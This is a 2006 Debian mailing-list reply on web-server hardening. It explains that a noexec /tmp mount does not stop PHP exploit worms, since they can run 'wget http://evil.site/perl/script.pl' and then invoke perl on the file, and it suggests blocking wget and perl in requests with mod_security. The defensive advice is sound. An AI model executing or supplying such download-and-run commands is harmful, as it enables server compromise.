On Mon, Mar 13, 2006 at 09:02:13AM +0200, Enver ALTIN wrote:
> If you have to leave some writable folders for Apache user, say, /tmp,
> moving /tmp to another partition/filesystem and mounting it with
> "noexec" option would prevent most harm /any/ PHP script can cause.
Not true.
Several of the receent exploit worms do the equivilent of this:
cd /tmp
wget http://evil.site/perl/script.pl
perl /tmp/script.pl &
Even if the /tmp partition is mounted noexec this will still work.
(Although '/tmp/script.pl &' would fail.)
Noexec can help in some situations, but blocking 'wget', 'perl'
etc in requests via mod_security is a much more useful thing to
do.
Steve
--
Debian GNU/Linux System Administration
http://www.debian-administration.org/
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
